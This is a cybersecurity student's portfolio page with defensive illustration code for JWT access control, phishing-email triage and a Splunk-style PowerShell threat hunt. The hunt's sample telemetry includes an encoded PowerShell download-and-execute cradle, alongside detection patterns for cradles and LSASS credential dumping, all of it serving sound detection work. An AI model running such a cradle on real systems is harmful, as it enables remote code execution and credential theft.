Bellini College of Artificial Intelligence, Cybersecurity & Computing

Hello, I am

Yupeng Liu

USF Cybersecurity  ·  GPA 3.9 / 4.0

3.9 GPA · Industry Certified · Top 3 CTF Finishes ×2 · 50+ Phish Analyzed
About

Cybersecurity student at USF passionate about understanding how attackers think and operate. I pursue hands-on labs, CTF competitions, and real-world simulations to sharpen both offensive and defensive skills.

I thrive in fast-paced, problem-solving environments — whether it's tracing a threat through log data, hunting malicious behavior in Splunk, or exploiting a machine on Hack The Box.

Location: Tampa, FL
Email: maybe1107liu@gmail.com
USF Email: Ly21@usf.edu
Phone: (954) 300-7122
Degree: B.S. Cybersecurity, Dec 2027
Languages: English, Mandarin
Skills
Programming: Python · C / C++ · HTML · SQL · SPL · KQL · Bash · PowerShell
Security Tools: Wireshark · TCPDump · Snort · Suricata · Splunk · Nmap · Nessus · Burp Suite · Metasploit
Platforms & OS: Kali Linux · Ubuntu · Windows · AWS · Microsoft Azure
Frameworks: NIST CSF 2.0 · ISO/IEC 27001 · MITRE ATT&CK · OWASP Top 10
Projects
IAM & Role-Based Access Control System
Oct – Dec 2025
FastAPI · Python · JWT · OAuth2 · SQLite · SQLAlchemy · bcrypt
Designed a secure backend API with JWT authentication and OAuth2 password flow for user identity verification.
Built an RBAC system enforcing least privilege and fine-grained authorization.
Implemented bcrypt password hashing with per-user salts to mitigate credential exposure.
Centralized token validation and request-time permission checks to protect all sensitive API routes.
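Added example for the IAM project above. This is illustration code written for this page, not the project's FastAPI code: it uses only the standard library, so PBKDF2-HMAC-SHA256 with a random per-user salt stands in for bcrypt, a hand-rolled HS256 JWT stands in for the JWT library, and the signing secret and role-to-permission table are assumed values. It shows the three pieces the bullets describe working together: salted password hashing with constant-time verification, short-lived signed tokens with the algorithm pinned and expiry enforced, and a request-time authorization check that separates "who are you" (401) from "what may you do" (403).

```python
import base64
import hashlib
import hmac
import json
import os
import time
from typing import Optional, Tuple

# Assumed HS256 signing secret; a real deployment loads this from configuration, never source.
SECRET = b"example-signing-key-do-not-use-in-production"

# Assumed role-to-permission table; the project's actual roles are not listed on the page.
ROLE_PERMISSIONS = {
    "admin": {"users:read", "users:write", "audit:read"},
    "analyst": {"users:read", "audit:read"},
    "viewer": {"users:read"},
}


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hash_password(password: str) -> str:
    """Salted PBKDF2-HMAC-SHA256 (stdlib stand-in for bcrypt); stored as 'salt$hash', both hex."""
    salt = os.urandom(16)  # fresh per-user salt, so two users with the same password never share a hash
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return f"{salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(digest.hex(), digest_hex)  # constant-time compare


def issue_token(username: str, role: str, ttl: int = 900, now: Optional[int] = None) -> str:
    """Mint a short-lived HS256 JWT carrying the subject and its role."""
    now = int(time.time()) if now is None else now
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = b64url(json.dumps({"sub": username, "role": role, "iat": now, "exp": now + ttl}).encode())
    sig = hmac.new(SECRET, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{b64url(sig)}"


def verify_token(token: str, now: Optional[int] = None) -> Optional[dict]:
    """Return the claims only if segment count, algorithm, signature and expiry all check out."""
    now = int(time.time()) if now is None else now
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None  # pin the algorithm: rejects alg=none and key-confusion tokens
        expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return None
        claims = json.loads(b64url_decode(payload_b64))
    except ValueError:  # wrong segment count, bad base64, bad JSON
        return None
    if not isinstance(claims, dict) or not isinstance(claims.get("exp"), int) or claims["exp"] <= now:
        return None
    return claims


def authorize(token: str, required: str, now: Optional[int] = None) -> Tuple[int, str]:
    """The check every protected route runs at request time: 401 for a bad token, 403 for a missing permission."""
    claims = verify_token(token, now)
    if claims is None:
        return 401, "invalid or expired token"
    if required not in ROLE_PERMISSIONS.get(claims.get("role"), set()):
        return 403, f"{claims.get('sub')} lacks {required}"
    return 200, f"ok for {claims.get('sub')}"


if __name__ == "__main__":
    stored = hash_password("correct horse battery staple")
    print("password ok:", verify_password("correct horse battery staple", stored))
    token = issue_token("alice", "analyst")
    print(authorize(token, "audit:read"))   # (200, 'ok for alice')
    print(authorize(token, "users:write"))  # (403, 'alice lacks users:write')
```

Two details worth noticing: the signature is checked before the payload is ever parsed, so an attacker-controlled payload never reaches JSON decoding unverified, and the permission lookup is done against the server-side role table rather than trusting a permission list inside the token.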
Phishing Analysis & Automation
Sep – Oct 2025
Ubuntu · Python · VirusTotal · emldump.py
Investigated 50+ phishing emails analyzing headers, sender metadata, URLs, and attachments.
Inspected SPF, DKIM, and DMARC authentication results to detect spoofed sender domains.
Performed static and dynamic malware analysis extracting IOCs (hashes, domains, IPs).
Automated triage workflow with Python scripting — reduced manual time by ~30%.
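Added example for the phishing triage automation above. It is illustration code written for this page, not the project's script, and it works offline on a constructed sample message (the domains, addresses and attachment bytes below are made up for the example). It performs the header-level checks the bullets list: reads the SPF/DKIM/DMARC results from the Authentication-Results header, compares the envelope sender (Return-Path) with the header From domain, pulls URLs from the body and checks whether their hosts belong to the claimed sender, and hashes each attachment while flagging risky or double extensions.

```python
import email
import hashlib
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed sample message for this example; not a real phishing email and not from the project.
SAMPLE_EML = """\
Return-Path: <bounce@mail-secure-login.example.net>
Authentication-Results: mx.example.com;
 spf=pass smtp.mailfrom=mail-secure-login.example.net;
 dkim=none (no signature);
 dmarc=fail header.from=bank.example.com
From: "Bank Support" <alerts@bank.example.com>
To: victim@example.com
Subject: Urgent: verify your account
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Your account is locked. Verify at http://bank-login.example.net/verify?id=123 within 24 hours.
--b1
Content-Type: application/octet-stream; name="invoice.pdf.exe"
Content-Disposition: attachment; filename="invoice.pdf.exe"
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AAA==
--b1--
"""

AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s<>\"']+")
RISKY_EXT = (".exe", ".scr", ".js", ".vbs", ".hta", ".iso", ".lnk", ".bat")


def domain_of(header_value) -> str:
    """Lower-cased domain of the first address in a header, or '' if there is none."""
    addr = parseaddr(str(header_value or ""))[1]
    return addr.rsplit("@", 1)[1].lower() if "@" in addr else ""


def triage(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    auth = {m.lower(): r.lower() for m, r in AUTH_RE.findall(msg.get("Authentication-Results", ""))}
    from_domain = domain_of(msg.get("From"))
    rp_domain = domain_of(msg.get("Return-Path"))
    flags, urls, attachments = [], [], []

    # Authentication results: anything other than an explicit pass is worth a flag.
    for mech in ("spf", "dkim", "dmarc"):
        if auth.get(mech, "missing") != "pass":
            flags.append(f"{mech}={auth.get(mech, 'missing')}")
    # Envelope sender vs. header From: SPF can pass on the envelope domain while the From is spoofed.
    if rp_domain and rp_domain != from_domain:
        flags.append(f"envelope sender {rp_domain} != header From {from_domain}")

    # URLs from text bodies, checked against the domain the message claims to come from.
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and not part.is_attachment():
            urls.extend(URL_RE.findall(part.get_content()))
    for url in urls:
        host = (urlparse(url).hostname or "").lower()
        if host != from_domain and not host.endswith("." + from_domain):
            flags.append(f"link host {host} does not belong to {from_domain}")

    # Attachments: hash for IOC sharing, flag executable or double extensions.
    for part in msg.iter_attachments():
        name = part.get_filename() or "unnamed"
        data = part.get_content()
        if isinstance(data, str):
            data = data.encode()
        attachments.append({"name": name, "sha256": hashlib.sha256(data).hexdigest()})
        if name.lower().endswith(RISKY_EXT) or name.count(".") > 1:
            flags.append(f"risky attachment {name}")

    return {"auth": auth, "from_domain": from_domain, "return_path_domain": rp_domain,
            "urls": urls, "attachments": attachments, "flags": flags,
            "verdict": "suspicious" if flags else "clean"}


if __name__ == "__main__":
    result = triage(SAMPLE_EML)
    print(result["verdict"])
    for flag in result["flags"]:
        print(" -", flag)
```

The SHA-256 values and URL hosts in the result are what would be submitted to VirusTotal or a blocklist in the next step; this block deliberately stops at extraction so it runs without network access.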
Azure Honeypot & Sentinel Log Analysis
Apr – May 2025
Microsoft Azure · Sentinel (SIEM) · KQL · Python
Deployed a Windows 10 honeypot VM in Azure with open RDP/SMB ports to attract real brute-force attacks.
Integrated Microsoft Sentinel for log collection and used KQL queries to analyze failed logins by IP and time.
Added IP geolocation enrichment via Python scripts, detecting 500+ login attempts in 48 hours.
Labs
Network Traffic Analysis
Wireshark · TCPDump · Ubuntu · Linux CLI
Captured and analyzed live network traffic and malicious PCAP files to identify abnormal communication patterns.
Applied grep, cut, sort, and uniq to isolate repeated IPs, unusual ports, and anomalous packets.
Identified intrusion indicators from packet headers, payload contents, and session flows across TCP and UDP.
Incident Response — Malware Triage & Containment
Splunk · Sysmon · Windows Event Logs · MITRE ATT&CK
Investigated a simulated endpoint compromise by triaging Sysmon and Windows Event logs to establish a full attack timeline.
Identified initial access vector, lateral movement, and persistence mechanisms mapped to MITRE ATT&CK techniques (T1059, T1547, T1003).
Correlated process creation, network connection, and file modification events in Splunk to confirm scope of compromise.
Produced a structured incident report with IOCs, affected assets, containment steps, and remediation recommendations.
Threat Hunting — Malicious PowerShell Execution
Splunk · Sysmon · PowerShell Logs · Windows
Demonstrated a full threat hunting methodology for detecting malicious PowerShell execution using Splunk and Sysmon logs.
Progressively narrowed from broad data discovery to specific IOCs — uncovering payload download, persistence, and credential dumping.
Identified attacker TTPs: encoded command execution (T1059.001), registry persistence (T1547.001), and LSASS access (T1003.001).
Built and refined Splunk SPL queries to surface high-fidelity signals buried within high-noise PowerShell telemetry.
Threat Hunting — Malicious CMD Execution
Splunk · Windows Security Logs · Event ID 4688
Hunted for malicious cmd.exe execution using Windows Security Event ID 4688 (Process Creation).
Leveraged SubjectUserName, NewProcessName, and CommandLine fields to track full process lineage and confirm the attack chain.
Correlated Security log artifacts with Sysmon data to cross-validate findings and eliminate false positives.
Demonstrated how Security logs provide a complementary detection layer to Sysmon across the kill chain.
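Added example covering the three Splunk labs above (incident response triage, the PowerShell hunt, and the Event ID 4688 hunt). It is illustration code written for this page, not the labs' SPL searches, and it runs over constructed Sysmon and Security events rather than a real dataset; the PIDs, user names, IP and registry path are made up. The encoded command is produced in the block by UTF-16LE plus base64 encoding a known download cradle, which is exactly how an attacker builds a -EncodedCommand argument, so the detection has to undo that encoding rather than string-match on it. The logic maps findings to T1059.001, T1547.001 and T1003.001, cross-validates the Sysmon process create against the matching 4688 record (note the PID is hex in 4688 and decimal in Sysmon), and groups the results by PID into a per-process attack chain.

```python
import base64
import re
from collections import defaultdict

# Constructed telemetry for this example (not from the labs). The encoded command is built here by
# UTF-16LE + base64 encoding a known cradle, the same way powershell.exe -EncodedCommand expects it.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16-le")).decode("ascii")
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CMDLINE = f"powershell.exe -nop -w hidden -enc {ENCODED}"

EVENTS = [
    {"source": "Sysmon", "EventID": 1, "ProcessId": 4120, "User": "CORP\\jdoe",
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": PS, "CommandLine": CMDLINE},
    {"source": "Security", "EventID": 4688, "NewProcessId": "0x1018", "SubjectUserName": "jdoe",
     "NewProcessName": PS, "CommandLine": CMDLINE},
    {"source": "Sysmon", "EventID": 3, "ProcessId": 4120, "DestinationIp": "198.51.100.7", "DestinationPort": 80},
    {"source": "Sysmon", "EventID": 13, "ProcessId": 4120,
     "TargetObject": "HKU\\S-1-5-21-1004\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": CMDLINE},
    {"source": "Sysmon", "EventID": 10, "SourceProcessId": 4120, "SourceImage": PS,
     "TargetImage": "C:\\Windows\\system32\\lsass.exe", "GrantedAccess": "0x1010"},
    # Benign admin script: same binary, no encoded command, ordinary parent. Must not fire.
    {"source": "Sysmon", "EventID": 1, "ProcessId": 5000, "User": "CORP\\svc_inventory",
     "ParentImage": "C:\\Windows\\System32\\svchost.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
]

# -e, -ec, -enc, -encodedcommand (any prefix PowerShell accepts) followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE_RE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b|\bIEX\b|Invoke-Expression|Net\.WebClient",
                       re.IGNORECASE)
LSASS_ACCESS = {"0x1010", "0x1410", "0x1438", "0x143a", "0x1fffff"}  # access masks typical of credential dumping


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none or it does not decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """One pass over mixed Sysmon/Security events, emitting ATT&CK-tagged findings in event order."""
    # Index of Security 4688 process creates, keyed by (decimal PID, command line), for cross-validation.
    seen_4688 = {(int(e["NewProcessId"], 16), e["CommandLine"])
                 for e in events if e["source"] == "Security" and e["EventID"] == 4688}
    findings = []
    for e in events:
        if e["source"] != "Sysmon":
            continue
        eid = e["EventID"]
        if eid == 1 and e["Image"].lower().endswith("powershell.exe"):
            decoded = decode_encoded_command(e["CommandLine"])
            if decoded is not None:
                findings.append({"technique": "T1059.001", "pid": e["ProcessId"], "decoded": decoded,
                                 "cradle": bool(CRADLE_RE.search(decoded)), "parent": e["ParentImage"],
                                 "corroborated_by_4688": (e["ProcessId"], e["CommandLine"]) in seen_4688})
        elif eid == 13 and "\\currentversion\\run" in e["TargetObject"].lower():
            findings.append({"technique": "T1547.001", "pid": e["ProcessId"], "key": e["TargetObject"]})
        elif (eid == 10 and e["TargetImage"].lower().endswith("\\lsass.exe")
              and e["GrantedAccess"].lower() in LSASS_ACCESS):
            findings.append({"technique": "T1003.001", "pid": e["SourceProcessId"], "access": e["GrantedAccess"]})
    return findings


def attack_chain(findings):
    """Group techniques by process so the findings for one PID read as a kill chain."""
    chain = defaultdict(list)
    for f in findings:
        chain[f["pid"]].append(f["technique"])
    return dict(chain)


if __name__ == "__main__":
    results = hunt(EVENTS)
    for f in results:
        print(f)
    print(attack_chain(results))  # {4120: ['T1059.001', 'T1547.001', 'T1003.001']}
```

The benign inventory script is in the sample on purpose: the same binary run by a service account with a plain -File argument produces no finding, which is the noise-versus-signal split the hunt bullets describe. In a real Splunk search the same decode step is done with a scripted or lookup-based decoder before filtering on the cradle keywords.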
Hack The Box — Machine Exploitation
Kali Linux · Nmap · Metasploit · Burp Suite
Actively attacking HTB machines — enumeration, exploitation, and privilege escalation to root.
Practiced CVE exploitation, web application attacks, and lateral movement techniques.
Building attacker mindset to strengthen defensive security knowledge.
Contact

Looking for internships and entry-level roles across cybersecurity — whether that's security operations, threat detection, penetration testing, or security engineering.

Personal Email: maybe1107liu@gmail.com
USF Email: Ly21@usf.edu
GitHub: github.com/ly21-yi
LinkedIn: linkedin.com/in/yupeng-liu-0128b9325
Phone: (954) 300-7122